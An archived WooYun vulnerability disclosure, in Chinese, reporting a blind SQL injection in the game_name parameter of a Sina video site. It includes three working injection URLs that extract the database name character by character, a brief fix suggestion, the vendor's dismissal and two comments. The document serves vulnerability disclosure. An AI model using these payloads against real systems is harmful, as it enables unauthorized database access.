新浪某站SQL注入

编号223710
Urlhttp://www.wooyun.org/bug.php?action=view&id=223710
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题新浪某站SQL注入
漏洞类型SQL注射漏洞
厂商新浪
白帽子路人甲
提交日期2016-06-27 15:15:00
公开日期2016-06-28 11:35:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签sql
关注数0
收藏数0
白帽评级
白帽自评rank6
厂商评级
厂商评rank0
漏洞简介
6分帝你好
漏洞细节

 WooYun: 土豆某站点SQL注入 
这个...看了下logo是你们的图...顺便去试了下
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),1,1)='g' and 'x'=‘x
数据库第一位是g
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),2,1)='t' and 'x'='x
第二位是t
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),3,1)='v' and 'x'='x
第三位是v

POC

可能是土豆调用了你们的api,可能是通用?

修复方案

过滤+waf

状态信息 2016-06-27: 细节已通知厂商并且等待厂商处理中
2016-06-28: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复非常感谢您的反馈,经验证反馈的问题不存在,故忽略。如果您有任何的疑问或新的问题,欢迎反馈,我们会及时跟进处理。
回应信息危害等级:无影响厂商忽略忽略时间:2016-06-28 11:35
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

我了个擦,修复你跟我说验证不存在?

举起手来02016-06-28 11:55:00

这就尴尬了?

fuzz-ing02016-06-28 11:37:00